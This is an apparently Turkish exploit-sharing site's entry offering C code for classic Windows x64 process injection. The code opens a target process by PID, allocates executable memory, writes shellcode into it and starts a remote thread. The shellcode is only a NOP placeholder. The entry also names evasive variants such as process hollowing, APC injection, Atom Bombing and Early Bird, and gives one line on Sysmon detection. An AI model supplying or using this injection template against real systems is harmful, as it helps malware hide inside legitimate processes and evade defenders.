Siber Alem / Detail / 255 / Windows-x64-classic-process-injection-remote-thread-shellcode
vuln_report_viewer.sh
VULN REPORT / shellcode / ID: 255

Windows/x64 Classic Process Injection - Remote Thread Shellcode

2026-07-21
3 görüntülenme
Doğrulandı
Windows x64

Özet

Bu kayıt, hedef sistemde bulunan bir zafiyeti detaylandırmaktadır. Zafiyet 2026-07-21 tarihinde yayınlanmış olup, topluluktan 3 görüntülenme almıştır. shellcode kategorisinde sınıflandırılmıştır. Kullanıcıların teknik detaylar için Detay sekmesindeki kaynak kodunu incelemeleri önerilir.

exploit_255.txt

Modern Teknik - Windows x64 - Process Injection

Windows/x64 Classic Process Injection - Remote Thread

Process injection, shellcode'u megru bir Windows process'inin bellek alanina yazarak calistirmayi saglar. Bu sayede zarali kod megru surecin altinda calisir.

C ile Classic Injection

Sysmon Event ID 8 ve 10 ile tespit edilir.

#include unsigned char sc[] = "\x90\x90..."; // payload int main(int argc, char** argv) { DWORD pid = atoi(argv[1]); HANDLE hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); LPVOID m = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hP, m, sc, sizeof(sc), NULL); HANDLE hT = CreateRemoteThread(hP, NULL, 0, (LPTHREAD_START_ROUTINE)m, NULL, 0, NULL); WaitForSingleObject(hT, INFINITE); CloseHandle(hT); CloseHandle(hP); }

Gelismis Varyantlar

Process Hollowing - Suspend + unmap + yeni image APC Injection - QueueUserAPC ile thread uyandirma Atom Bombing - GlobalAddAtom + NtQueueApcThread Early Bird - Suspended process'e erken inject

Yazar Profili

599eme Man
599eme Man Seçkin Üye
Tüm Gönderilerini Gör

Kayıt İstatistikleri

Görüntülenme 3
İndirmeler 0
Yorumlar 0